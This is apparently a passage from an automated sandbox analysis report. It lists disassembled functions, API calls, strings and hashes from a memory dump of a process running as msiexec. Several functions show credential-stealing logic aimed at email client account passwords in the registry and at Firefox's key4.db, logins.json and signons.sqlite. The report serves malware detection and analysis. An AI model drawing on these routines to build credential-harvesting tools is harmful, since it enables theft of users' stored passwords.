                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,68137B60,?,00000000), ref: 00402533
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                    • API String ID: 168965057-606283353
                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                    • _mbscpy.MSVCRT(?,?,68137B60,?,00000000), ref: 004028A3
                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68137B60,?,00000000), ref: 0040297B
                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                    • API String ID: 1497257669-167382505
                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2998058495-0
                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                    • API String ID: 231171946-2189169393
                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 633282248-1996832678
                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                    Strings
                                                                                                    • key4.db, xrefs: 00406756
                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                    • , xrefs: 00406834
                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                    • String ID: salu
                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                    • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                    • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 0040957B
